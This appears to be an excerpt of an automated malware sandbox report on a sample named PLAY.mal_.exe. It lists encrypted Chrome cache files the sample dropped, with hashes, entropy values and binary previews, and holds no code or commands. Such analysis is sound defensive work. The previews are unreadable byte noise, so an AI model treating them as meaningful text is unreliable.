        Preview::Z!.mX..+.m.N.G....iL.....i5C.L..U..2c..)mQ.1HW.....I.I...'7l....Z@t...$....:..z.J./c....J.......4.L...J%z...P..C..A..s].K6.0L..n*...n.........m..0.,I..=.._..a 3$...']\..vZ..0..l..-......v..hyO.(.-.P..%:.vr.kK|...&...^.5&.:......".b3VH......Pl...IPe.*...'B.....2_..Y..?vPX...zA.....y...2..i.dX`/..@.a.?....>..B.=............F...b...,..o/..&4...>.f.2.;@........x....7..t\.T/..Ir..9.X.....".5...B...RIJ.I.......`.V.f.p........6*..,.|.......Ou......#..d...B<..gP...O...~..^.f........b.;.=:3L/...9s.......!...R.Q..&......|."&E...^d.2.N.E.D.P..Gk.D.r..y........E..^....x.;?...WP.Z;.6b.....c>]..K.....8df3L....r.O..d.wm'L.;.l:.7 ....*6..k.GPQ.W....>.Y.*.....N..:...Nl.....X..'...w!...".....>}z..l....M.+..4........)`..$.Y. .&.N..c.c....B.GRt..!.O*,.R-,...._..H.r......&.....~... ...9...:...q...Ro].....6.D|...=..A.......4J^..p....m/N....o@.s....,.$U..9....zt.u............RvZkus9K..q....#....#.J...r3j..6..A.oE..Q..L.R.... .4MQ..I..L....)..C........M.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000d

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):50312
        Entropy (8bit):7.996358027795271
        Encrypted:true
        SSDEEP:
        MD5:01A4BEDF92ABF5993EF2B32A17F6A431
        SHA1:989DCBFE155FE6F45B7A2298FF2BFF3D9FCA3C83
        SHA-256:97CEAE16A8F6D141E078B9561F76FD5224552A8179FB8CCE0CD707A0303EFC53
        SHA-512:F98372119FC93EAF321C1C98B70F2CE14FABBA6BCE4E3AB826208342D8787B87ECF16F437DD4E148FD02C8178D2870A9B4B97E436DCF8D5664EC33BD82160A40
        Malicious:false
        Preview:...V.K..M....g5.....<j<.d&.~..!.`...#....9(..G}.6.%!......?..`.. .wF..z;.B5..^..EL..e.c|_...02.d....)..O..gj....O...w..<.qj.?Lcx....W.D..O....3..2.g.../..}.-....S...mI.....g.%...[....&........$b.ys`.....P.s.........,..*.].-(R5....Hwj..}oT.....m..o)...\..yis....n..7.....b....b)c.C.pRp.p.b2..&...1>..I.ly...L4..NO.r.f.?.Fp..g...>N.r_.....[qN.F~r.|[m.P9_....V...2?.{...o.F_.aI....6.b.....pGz.......&T~.u.q.%pj..by.UY.....D~.$...3..........v..,h..Q.y.g.t.te..A{.R`..Z.'..ea..|.^sS.y&...7.\.[Y"?........Z..S....W..X.Y....Z..~.....' ...^.A....p.&N3R..P.ty...|.TB?......r..80WvY..:...a.>.....y.{....d....I..F1b.........?.9...#.......'.B.?{m..q.[M~C..z.R._.b..c.....U{....L...Gy...A':.2.9.~q.iB.c....~Z...9..U.Fn. $..-..I]..^.+oj.$.......q.b.y..a.^.udE......7p..C.......o..~....J9...I..y.a8.....m......,m.n.r)..HZ..r.(3.^...&....Me.....4CB+jF...U...9.u).a.y..9... D..Z9.W.2<.v....#..9.&7`f.r.......k=2-.j*A.F..F..F..F...D..%...m!`6......L...;.wX.`

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000e

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):37672
        Entropy (8bit):7.995943419057123
        Encrypted:true
        SSDEEP:
        MD5:FC93CF900691A70E80FCFE4E7BA94C81
        SHA1:091F028B66C9D2F7202972023C1A39ADB342C64D
        SHA-256:BDA2B38E633D9E7A0D79175671BB43E4CB72996309DA500BEAD6162761EA65EC
        SHA-512:381F84FBF958141399029CEEC618C7CAFC1D19E8BB5D055CBB81E8FF4A44B0399F74576FF4B908F66C2A78E6A05A9E3CB55D1EF699568AC7DCC7E4E3949EDA1F
        Malicious:false
        Preview:...\..nZ..{."V....s....9.e.E...2..../...H.S)%...jO..1..E.....A.#5NK.g....8.....nA7.?......L....!1.......OZ6...]/0..=.P.."H\.|A&$.j.+..Y..I..~.....^...@.?Y.4O)...*.Gt.V...Z./zR..-..V.hpo....<w.N+...Z.......S.Jq7....+.).8..E.(.2.....7......}..i...... W....ff}'...;.V....a....?.4.(..b.[.h.(z...W[.vf..gp....@L.C.W..KY.m:_.(Q*@.|.._.G.....g.1V....i.>.@1...pu/i!S[...4.iq..q......Ukr.pek...N.....y.#k..y..[.d..I.1..el..dG'vTJ......+mT.......W...........C..h.9+...f\.:...M.-.*.....}....#.@0..M.NuTH....9Y.AFW...hdBS...iF.Y..em3..Fqj........uO..K.!e....m.=.R.b!.....k......vk.9...A.K{....(U.JN....N...T75..&.....V.k.GX.._......m..6..%M.64`.mh...K%..l....I(....2s.cDv..m\....*{......5....J.{..pZ..{3C..6.k<8.?.......Jq.O.....iQ.i..#.M.......T\.Bg.....k'r.hl...St.......t..w}..z.].....T.....xI....?j...... ..v.q...;...-v...8R.q...Q....7F#.Z...V...so..5..-.....<..,.R.-.g5."-.....^.....=zuy............z.....U.h.t...s...%....K...[./.@.G..Q?&.n.'<.j....B-.....

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000f

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):45704
        Entropy (8bit):7.9960938234091925
        Encrypted:true
        SSDEEP:
        MD5:93FCF9F465710FDEF1FF8E8C9C29E524
        SHA1:CE39D4B6FF08D02DA7692B3122A22027AEC771ED
        SHA-256:16E6B1F83E7EB3DB54899EF2B77EB4EDAB9649AB46F76C48645D1838CDF223B7
        SHA-512:F4DEBD7D48BB729DC49B69092A265996A49A50BE2A8462E518255E3E3867FD9D81E852579866D7D1A19E3D5E5E742F8050E17C17C88B538A4BC7CC8DCD65121E
        Malicious:false
        Preview:......MP............(Pq^...........AS...*....q..D.o....>h./.......f..t.q:....-VYf..n^:.....?..i%..D....R1z..........k..[.......~n#...hk1....6V...../tp.SM).........Ob.<Cq..)t99Z.]n.zF.5](Qb.Llbq_.........Y1....R..5.7..,........t..+u...>k?..y.L.FY0:!f.........y\?/..X>.......l........dgp.G.]s.......5..nX.\...o..~.....0.m.......Lmr..>.}w.*.:[..\..k.k>...V.X..U..~.K...G.<.P,..A..i..<P.*!...*..d..K..K..)5.X..,....7a)...T.._.l..m.y-kr[W....Q.A...lb.g...V.......#.#........{.B#K($A3NB...-~p.QK...rZ..O9..{....`j....U./G.)9.9...6=.S...p.UU....{.Z..?......^..w...J.|A....!g.`}..?.....{...w?....>W...Lk.!.....Y...o.*.^c.-.(...sR..y..#..p.O.....d<;...j20[........j.X.}L..X.K...w.c.4...O.9............;WD..g7..w...V.W../.,}7g...~>.R.{..3.<.m.Q...XM.(Owu0....B"..{...0.u.e.....2...b.%..u...<>R...;qc..q.G'.....Tp...<.u..7..h.....3W..C^.....z..._..Q.\..$lD..07.....M.O.:...S2,8.....)g.>qK.I2.".#D.E....1@.."..Dz.Z.g.!....h.]7....h..Zqf..m[.1.l......s.....^...u.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000010

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):42120
        Entropy (8bit):7.995403255802123
        Encrypted:true
        SSDEEP:
        MD5:E56CD11BB7342EFA1186217EB5C67472
        SHA1:5FAF7CD5475BA4A59F8B9F4315D2DF9E8268E4C4
        SHA-256:554FC9E649106D3E6AF5925E7B8A9CA4F19236C1D7059C8ED1A59FBF30864313
        SHA-512:D4673DC455FE30AA045CDAE1D3F5B50B5F54366197429F9036DCC26B04F5125E88E9281BED04D55D8CD69212BC68883908D3E777441C19A448E484660B7386ED
        Malicious:false
        Preview:....y...6..5..w..F`../.`eFv[...}..1L....pH........b.1...C....U..Q.[*....q.^..d.LD.0....!(x..'..l...m.......gJM.n}....9............ .\...[......l`p4...:.<..O.t..2..B.....H.....Au..T-L.{/.x.i...8..[?w......mM{...1pX..VK..oC3o.......;X....:..+.)h0Xb...$.cE..R..K@.....x..Q`6.fa....m...2.z.T...Z.ky#...V.....Q...2.P.dIV.|.IZ.(.9........z..yp......7.T..+..',.[$........R ...|...g."n.o..C1.....v....g>..}.0.*..5.6)....t.....1..d.f.%%-.H.C_..'8G..R......i.[N.....,Iv.%5T.B..=t..c*AH..#.?0.N...-_v...o..~R.F..F2.*E.$..,<..$....6.>?..QDuv..~...}..G.7.<.j.].9,;P...,..hn.p...F3v..'...Aa..:..J.!.$2..?..>..~."=.........a=".z.q. j.|.7.1.<..fH.......>.q.......lv...r...^.+.#<_.T\.......6....b..W..#..;...ms...g..<r.....B....|....Wf.......kT....WN...n.U...E}..%0.. .t.....E.-K.. ..WXIs...s..B..{...:.gSX...&KzF.;.<........X.g..c......e.\>......X0...oy#$e.r.~...F.I.I.....B...[.......{u..z...6.>D...Gd.6.F..UDT.G...7UgG2.z.c........I...Lz3x.......WC... .......s..G...)..v

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000011

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):48936
        Entropy (8bit):7.996331187328178
        Encrypted:true
        SSDEEP:
        MD5:BD9BFC0266B4430197BAF61189B62A9B
        SHA1:B3EFD8181835D35C7DB7B89CE9F762B9755725A3
        SHA-256:7A978B73FE59D5ED4CFE3FA29430F28F9DFA1DCC228E3501309BA491BD07DAC4
        SHA-512:531D08E54A20EF602C1FB14C6A9CF18BCFE04A72F1F43927B20189C9576DB25CFE1711FBEE07FD0ECF92720076744FE37FE644C3E4F397A422674EC7C5661355
        Malicious:false
        Preview:5.2.8...Y.D.W=..\j.._.T......Z...n.?.C..i......".z.....\.S...M.*.......Z.+.....[....Y...k....;.x.lM.Dj...G[..?3....1+.C..AU..0H..Wp!<...=.2..[..WG..._..N.~5..^..~.......|..m...z....%'Y.d|..p*.EN{...l..X...E?LG.)..EPd.J....O\%..J...&L<.z7.(s...;t9Z......>.@K..(.C....B...5.T...f......`....A.k....A....b......U......Iy....E...x.........NS...`4..?.Jq.5+..K....Z..,.9.}Sm....0.....@.......b..*4.>.O...Z<.f.z...X$u?..T..q.K...H.A...6Z..0?'f%'...zMvG...H.<..aR...;...84..J.`....u(..<2...f.wiF....#..H.c.!..f.L.....x.jX"0d.ff..|1Y.B..a.Yk.}.a...5...1d......XrW.!.....y^.!~o.....@.....UvJ ...D..>^yFq.n.@...weY..HQ...{5h..<..._....N.@gC.......v...9.(6......-z.....9G.7.=.G..<.........E....2=....;..jO ..3b...i..,.6......Z.n.#....eO..'.;X..z.."y.%@.....7h.a}e@q@...#V.9K.....N0J.c....=....|..x):n.....MBhMU...e...D...Y..cV.BY>..?....]aV..1R.IS.......]L..2.8.)y|)rx+Zm.=<)..B...5t..0.@..g..S.M...YJV02tw.'E'.^v..K....".U-..'..v.g....f.......c<..!>....2n.I...r.0...

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000012

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):63432
        Entropy (8bit):7.996741402138939
        Encrypted:true
        SSDEEP:
        MD5:AE253A5F8BCDEA921A2C94C43A660E4C
        SHA1:AF07A5B1802B9C49219E11951CD8477DDB71C263
        SHA-256:206F87009705A84763BB06988AE16D240DC424BF6DB8CC23D0BD07E39EB86453
        SHA-512:14776CB1043A46EF75572A7E2D56DA30CAADB1337E883769259962417F773E5DC8B1798E6F76F72811EA0ECC28F003CB170AB38CDED96E5C109FFAEF64D84548
        Malicious:false
        Preview:.<.gY.B......>#.....R..qB..<S..ua....$.......Fy.....~.._....#.r?..$..Km........d.3Q.3.=.}.....S6.\.~p......s',....l...._~,+.Lu....Ep.....X..w..6..S....'.......}...>.....G;V.g.5.0.%.>.....}0..A..Gf..;z....[ m*#.}.z.:r.U...&..q./C..C..uB.m.4=..5.3.(.......)....=r..'3......i......H./.V..1[X..tv/.j#....u..W........).......(}W>..l.....[t...=....+dm|....W.D.._Js.....Y.g@I....3V...{...X..I..G....A......)L.RV......t..VW........k.8.....'....e......b(........z..$/3...`.d......(..W...!...R......-..c.+m.\..O..vw$.A.6...9.....%MQ...8...kx2... .ob.........E.._|.q......3.W.]f~c.q..tXE.v.8....6m.P.#>}$.c2)&...j....l.......H.z$.J......u...w....b0P...=-...ZA.]".9H...>.>.k...r.A..%....|.%!.2..;.7..p....u.@...3`:.|k5#.B.xC.9.F.v...}.x9..E.......%...S.....2....~R...zl......f.=.,^.E...lx.;;.x..I.'..Pn....+.P4/..$!4+e......e.r..I.w.....`+B(.3..E{.o.v?.9..D<..5__.Rt~f7@.OS+..I~.7..[$..X..t...."v.../2A}Y.^.\.Y....I..EP)p.O.d..yH.#.Z.^.Yj.|q...%..?WF.c..y.......}.......

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000013

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):97672
        Entropy (8bit):7.998214000866305
        Encrypted:true
        SSDEEP:
        MD5:5389E416C4B3227742FC0422768D5FDC
        SHA1:A437067B27B9A8F68E5E01ACF58411BD922A213B
        SHA-256:9290E499FE92A85AA81F615EA4BF0EBE25B10D1F9197251876C7021571E64709
        SHA-512:836597F67F76F9746F540317D903CA898DE748E77C47554DD70180735BC5008C71B1363B04351E249416C3D7656A976BEC3A424C73521BC85F5B53193D7CC97C
        Malicious:false
        Preview:.XA..]E..3.69...,dK~.u. .#T.....;.'(.H._....j.j..lc...{d....w...i.u.|".......!.~l.].h......v.....x..O..c...Ux.......'YN....-..*.c......7%.....n13..N..g.<e.l.T.A.7x.N.'......A/G...|..V...9.:.....Ra..M...j...p]..P..J.1....rr;....p!.........&..C..J..f;).3..+....K>?A!...5..=...T..F....^....5.X.I4.....3.'1:...]..@....a...5..U>r..@}..' @..b.KU.$....4...j..l.&C.X.:P.]..PLg......$Q.rG{.5I....(3..[9.A~...../.....Y.$>xV..YZ.)\.`a.c.s.I......C....Q(...../.R:.).SX.t....i~]9..uh.f./....I.:...G.).S..l.....4.=jF..H.......n.9{...O.Yq...._.9t\.....v.@wK..<.Pw.rL....p.;e.\...EYK[I.f T|0y 9.O...........y..(..GH+.:.e...^.:.>XVy4..yY.NZF<[l..4..+..........A.K[O.(..=l..f..v?.%..=.........-,=J.G.....>&....o.B.t.kA........R.i .z..3.w.ekI.F..f...qS.5.p.(s..}e.....%...a}\..^G7...R.O.Xif=s0wq.6B+P.].....f.X].._q.Z...^6.O..z.:...:...n. ..O .......n.'}r....\...-I..]..|....q..4...T.?..:.......+.,..l......D\..VT&P.|..:.qk...[.........i%..-N>..Q....,...c..T..\.....

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\index

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):525736
        Entropy (8bit):7.999659891637715
        Encrypted:true
        SSDEEP:
        MD5:44D7FAA695258978F254C5D383EC2A20
        SHA1:5FDFFCFCEABBE529E7BA95E245F6F5E3E5C77ADC
        SHA-256:A0CF0807BE1C28B6DFBD03D031EB3E38DE733C21D22E52263418AC6BA2DE1DB4
        SHA-512:CB27DCC25E4C6E088F794D5C52B4100CA360DB5DF61B844A83EEC7189CDCAA14B84392E8A005C061B7D489C93C8CA4F206E1AA905EDEDEDD01BE9E1B2EF5E151
        Malicious:false
        Preview:6....T..o.\....#Y....L&......[ppFD...b.U.m*.......96R..l.EQs,i;.Y..a. .(.@.x...)..kx...O.".6?F......(f.._....:.+.|l.m..;LnB"... .Z?...o..._..6...DXV.b..E3.'.".U.q.'..>.B.H.D...7Js...qD..((..)+.....y.....0..H...@Enm..p...#..).*yyX.`j.jj=j0...!F].g..._|..z..s...m.R.1...b.....?.oV....%....V.H..6.R{.....5.........ea(.N.3.N55..m...].Y...f..........8N..G?\{a..rV...........=a9.o1..g.Y`...M*V=.4.W....M...:+g..'...5..7L..Wo...0.PL!.z.q..".7,s.1G....7.....q.K.....n..>0..Z....ZmIh.&.gzDZ.n...W.N..v. 7.!x7..jS...02.u..V#.dY......}.-.....T...$/T..;....yg.44...].W.r..w...{.......[ .v...R.'.T.....9j,...DtH.....y.].l:o..vPo.].......v.... ..i.fU....f.....0#......9._.Wb..(.G...6Z...|..~.g.,].y.4..2.m.^M^..`!^.\D'..E..6......hA..1d...........U-("-7._..L...(...G....$OG.....D66|.udOP}...V.......9..G..9U1_.w..R#..>.@.3..'.K..^K.c/u.qww.>S..,0J.,:....Z...Y..W.Xbu.`.......?.U.>..}N,....>.C..E.FN.......(.iT....0....io..k..|.-:.r.}.H.....^.E.Py....?.i..G...b.....4.R....XQ.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\02f2049f4d076920_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2280
        Entropy (8bit):7.910648446094838
        Encrypted:false
        SSDEEP:
        MD5:7D6736E1CCE485E6849B062E8855CB9E
        SHA1:70223E7215B6804707728392DBB3C9093DA631E1
        SHA-256:60DD3EBF88CDE31BDFCF1A2D52B518602D80A9A8C93AECE0F9009DEBE9E6F587
        SHA-512:316533D4F66E61D088EEC0ABE690C0D2A52E250CFB565FB17E062F451B4557593F6679201DA87B8FB40DED3F3E68615A1463EC68ABF37CC664E9D65B2907E6C5
        Malicious:false
        Preview:n.EU.Hp..TO*...e.j.b.nZ..O..cKp..).$.wC,..KG.f...........N...|P$....22...\.<.$.-....8.U6.5...k.vG...'J~.I.[...+}.{..!.[0.u)...P..OY..E.6.......H. |.....M..r.8.....]\...7.j..|........n...Nl#{....Lg...<..Z......6ppH.HIn*...%.}>..X.h....-G;T.a...X..1....wfTK.r.6.i...)sSr..oX..bH..U)...P... ?H0.y....|!tuPh......0...o...X.}.Rr..XJj....(....0...d/n.x.../&M..bLCA..:.%..hL.2.uA>DTX...I....97.P".b..-.q%.~.B..wp3..Q*..B...|.)g.....4hq.|...s....(S..H...-..v..s..|.XR..'GJ...{y...X...0.....E.j.......)..).}Z.N..l.u..w.He........S.(#..{&..:..G/V.B......].u.I.=K.XW.V[A=).dv......LB.I..}A .....C....XC.....FJe....D.1[;....4E..7......'..U.^9.bP(.$FE.lD.9mv.KA.I.8...6..h.....A(=v...T.q..*m.#dg.'`}.y~.....mx.?.J.g.....o..........D.0..l.a..$.&n/.@..s.qq......g../._`4aICT:..S.|...........:.~....y+o."n...V.....V.b.YI.S.%...Q..U.....q'........h.P2/2.881...G.!f.PR..w.....7?..C...1.71.XA.&_bU...h=...}...,..c[.:'....8...7&..D../[......9..q.w..z.`.7F..........i....Q

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\0345d052e557eb30_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1464
        Entropy (8bit):7.869327060192945
        Encrypted:false
        SSDEEP:
        MD5:A4E2EE96F3AC290E915C29FA982C0FA2
        SHA1:ECB13D959F5275588313490AFEA661EB389BE461
        SHA-256:692028C71FE923BFFD14E3E1A8F7755C9AC96EF1D3589D4D1B94EBF8A73DD7F2
        SHA-512:F2491841F62476D13C66248EF03145BA36F0A5CFE00FF623E9A6AE038F35E36B8E9DA47515A285A7347AC8533C9B294E290CCC232FB162785E1C94AA80A7F6C1
        Malicious:false
        Preview:.h.2.Y.t.=.Y4.x";..r.<.E..-p.k.Y.Z....fzI U...,......u......X:.0......$}*9...F.SU_d|..TJ..OrOqZ...T^.....6.dos.D.D.+....\}C..d.8.0W.H......p..@&f?R.]..@D....;...I3.T.|....=.p.e....M....,...{...P...;.P../..7.......=.e..{x..l.%.k9*.lDof...t..Fi.....Q..yU.....12...]K!..B...H..cq).+s..7..\.0N..b;..[........:.....`....f.O..([..t....&:.....g....c...v.|j..K...).I..2..fm.I.....]...F.".....T..U.|.!.I>..........................H..vN2.P..[..u?.....2..&......f.EWuq.e.w..`..O.........(5K.pPVf.........oE.ZY4kg.....w..&.........._....8..[..HT............r...\..3M4..%...N..;..WO.;..~...+.yI....%I......Kq.6?.8..K...cf.'Y....A..jE ..6.i..z.Z...M..V.w......Tl...V7.yq..lci6#.F~.fl...N&.YR80..........@#.9r4..0..C<.....O.h.v..*.a...|..x.(..:o.Q\..V.g.a^....es..X.+.IV.DG...U..UX.WC.....*y...cHYI...l.D..<9..6d...a38....._.m.Dk....i....p$......F.. ....q.G.......9..:7....1..ea......]4.2*.>2......<.X..)I..#l.j/.6L.Nn.xW...$}.qIJ...|uq...'.._.AA......Z....=...

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\0cd82a09b7413176_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):4104
        Entropy (8bit):7.954103843826511
        Encrypted:false
        SSDEEP:
        MD5:1FD3CCA9710FA7C3FB5F3B8573D9B779
        SHA1:0B133B1C5AC6AFB21A9789663EBEE430FF44710D
        SHA-256:72C68F5D07240CF2A969324C5DC585E5C441FF6D95740CF8C212663AF4573947
        SHA-512:6D03175A91FA1C04FBCD0484040BE878F5FA6EFB62D03A3B1A9200D469E3BFF61F43C96474C9B3972895E695370065791C869038A8CF608D003172BA1BA0AF2A
        Malicious:false
        Preview:..."]$......xyoW...P...X?..#.C..Q.Zs...=.;.w..%JCV.X..=.c.....?..."G....+`(.....1...TS3jhej....S.......G.Y..W.N..8_.....{....C..~....~(h.I..:.5p.7...a.Y..v...{.`...G.P.c.L....)^+..ZU.%y2>..W.l..?.>...*...P(z...k....zG.8j9.-..!.sN..b..e....v...=..V.P.....MI.)*..b....}=^Z.\rj0..d..}...1....[s.h.s.H..qX6m.\Z...]O2..90_...!...Y..px..|.....#....U..*..l8.;...>:..u.-.......E..L..8.i.....F..X.........w...P.8.0p8.;..o.S...i.C.\.>>.CU......@...]....X..G]:......*^ ..(v,ib.l,...d.8.61..=....;.......&3..G.9w9.Z.....8)..$.W.<..Y.4.qEs...T..dH..(..8.s.6..?..}..KA..'......11.......s.f.7.O.Z.g..7j.W.1.....T2h....s....i....t...%Hn..h;.x..N7.....1j?.v..p.d..3.yA:..zG.....d.....l.K.i...#t.]q..4..&.Aa....l.<..I....;......._....h.;..J...Y{...p.....3..."._...K..<#&..+9..?..w...9m...M.........!....o...6+.J.q....@q.5.9...A...R.W.Xo......%g......YG..2.at...k...BV.=.....E..5..q."....*j.]...?...v............k........o~I.w1#....vG.......ab..x.\=._...`..@

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\12318cd0c335b8e0_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1336
        Entropy (8bit):7.846164507410506
        Encrypted:false
        SSDEEP:
        MD5:A941C4F2BAA577AA86A101E2F26677B6
        SHA1:525617CD1D6A8F9F2030B5C699FE1633A8CE9143
        SHA-256:2A4B1D77A90866E338371273DF67B9AC5076F86D47EF18B33EBBD47FFB0FECED
        SHA-512:DB192046C0C52A4C2A66D3A2AE697AD4D203186D908D765DDB42960BA55DC3C5773C048631E9A1A5DB393C3858DDBD3C3215C9EA2F4164CCE84C5D5F8D6B252A
        Malicious:false
        Preview:?q.!\I..%.....wiW.../..=Q..~.k..j.a|4..0..=i....h.k5AV....D...l....@.~.9.}i...hy:.&.v...E.i...bl$.<-/.|..........q......TZ.f"... ,a.D...G]cOA.P.T}}.x.....`..Af.{'.t.......z$....3-..1T.i....4.k.29.\.....8.."...d[lE.sC..d.@.../.=;e....:...}`....+..^7.9...!...T..U.|.!.I>..........................,.....z..YX+.w.{.Z.h.V..k.(.j.[?...j..;.K.......%...........$.....p...m.)j,.n.r.@w*...gF9y.@.'..,.u`...N.......*i,.../....m*cg......$\...I.e"T.b...k.x..M..sy. .F..DGk6=(.42........./...r..WN....l.D...V).!.X....M?ND.....G..8.....I.......]...S.~.E.....X.G c....jG.*...`g......{..p3...Tih.`......]...g..X....t.cL.{uw4?"...Y.,@.7W..:..k..~.5..P....8p.X+T....!..~......x.....J.Pv..;%2.A"E..U$......3...._2.sC..5....58w...d...Y-.>........F..<V&..F.E{\Ea..6.....U.0.w.x.1.i..J..#....#..i.0i. ....V..:....!.)v..n....-.G.g1.....T.f.d.......yY@....#.{x..b..F.T...wg.....U..nGPP...y.%.8c.T...gk.|....5.R[.R...-..L...8.V.6(..:.NGP......Lf]...v.O3G..=.7...

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\157ac5dc69855318_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1288
        Entropy (8bit):7.853608780333855
        Encrypted:false
        SSDEEP:
        MD5:10FCEB65AA10B4A3C3EF27A152BDEC93
        SHA1:3316F053FE3230D4125B3DD8C1016B17C8C2D29C
        SHA-256:754EB15FD65A7ACEBE4007C7F199B8364CE2B06A8F724698EE2741CBC8A18980
        SHA-512:A7C2C47413F5724E145C86B7F0122AB9D67FCF3D6A8F175A7FE1D4BF407AE708E964D0B9166F5A70941AB0617B01BD86C92BBE2A288717465A791F8B060C23E7
        Malicious:false
        Preview:$.....OQ.....zX.t.%...../....,H....st...3...T....'.....Y...d.-4.....4.I....Z467..|?x..n......K*..d4D..6w.N...#P. Fg.O..2u......FG{T..[\..<..C(.G....v..F....Du..N057f.b..4...y..N.1..........[gp.......M$]\.......T..U.|.!.I>............................{E.e.HL.x..KW...p."r...F...U......e...8=..\....35:X..i..q.|"..P...lZ..+..<.Mf:.K^5....4@.....~v..R......\`... {..m....(..v.T...x.d....h>..s~u..n...c...........v.2..>.1.l..Exm.7.t.-=Q\a.20..w......".K....33...BCF.J0.....<.|.a'../.q...&....?<.1d..J(...E6...T!.._..JO...........Utj....... ...C.e....E .E.....!.a+g......g............2...p.m..}._BA@...~..........C..-....(..n.k..~ Ef.u.+.xG..6...~X..1...c...28.....SL0..>/......1.i..]y7.e..F5Q7<....m.+Z...%O.....'*..(..v..@.T3,k..$9.x..&);eUN%..(o.z1..^x.._77.............O#....@pIb..y'...5.I...=O..z2.2X@A.!J.M.;.F.?.."q..I.k....<[7.....[......%....g..+j.6duL.g<C.i..;V..W.eO...H:A-..K......).<.F............D.f?......@...x?..(.R>.k.;q.F[..&....Ai5..K.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\17f7cd50011af964_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):70680
        Entropy (8bit):7.9972433687821525
        Encrypted:true
        SSDEEP:
        MD5:885BB932FDA75B443E63665F4561D972
        SHA1:B8B0EAD4372254F69B82DAFEF4BDD8307F2C52DC
        SHA-256:00FA9C16395944BEC7EE71555030C36C6D8FDD648EA249CB7CA3CE1D1C46E58C
        SHA-512:DC642A113254B033BD28C03E4325931B6D000A547BEC8EB2C2C957FF83ECFFBD972F1B5CA7C25EEFBA7F085D2C1239BFF94981295336A1C354BEF277EAD11B2B
        Malicious:true
        Preview:.Tu.K..b.x..P..F .w.lTt......f... ..0...5.AS}....&._...D.Mk3E6..).I_T..)......w.!....<Qc.tD].....K..*f..~.q..c..l/.{.K..?.......E....!c.v..0D.!U$2...1..h.. _..;...!|.s...-.@sI..0...3...(...\....Y.uk.a..7L...yK`.....2..aM|.9..g.B.l.w)....u..{0..8/=......_...>ZM.q.=.:....8..|...;5.fu#...z.".tE.k..m.x.o..Su..."f.G1.rA..I|.cH.&(6..sM....M}...5.....(..H0...l..D.2........X{G........N-..n...*..]..4.3.....&p{;A]......X.....&e.._>+i.w.E.a.r..U4.....He.i.}u....A!.K).......8...X..7..)..=.....+.<......vK\.....@..........z..f.M29....W..>.`...4..y.....:@...C8t..L.W/uZ....S<.m.G%#>5................3G.|...v.......=.X..W./EK..A..n....v.'.......b.)$W......k...^c.hf....$#.Lfx.b..L.v F...,..f...+f....I..&m.T....@...i....'.z..Jk......r.a......|Q\.y...P../y....<.k..`....L.v.....K..[...u..>.4..#......g....z.)...Z....q..._9.-5.}%.$.x...F?g.pOC..H[.Y.5....y......O...QU.J9..,Y{..'..n.e...tgN...E.....a...b.8.&.*N...y......C--.!.X.6..g.h..3.....M.d..}.t

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\181db4280bb3db70_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1528
        Entropy (8bit):7.87214955142188
        Encrypted:false
        SSDEEP:
        MD5:9AA40105840EC0D3266A6C0B474AD6EC
        SHA1:E48A4FEEF8B2DA686A05B05B9843E2EDCC481238
        SHA-256:8D2FF47CCD88C296EF4F364CF712FE2DE44F6F895731543EC0512A9F924CB796
        SHA-512:B2E8829E5E93B4727FD0B5B0213FCDE72352E6E327F9C809182EDB36BE3424289A8B1475AAF7028F0003CBCF26CA87542483E200D2904DA14590DF226CF1BE99
        Malicious:false
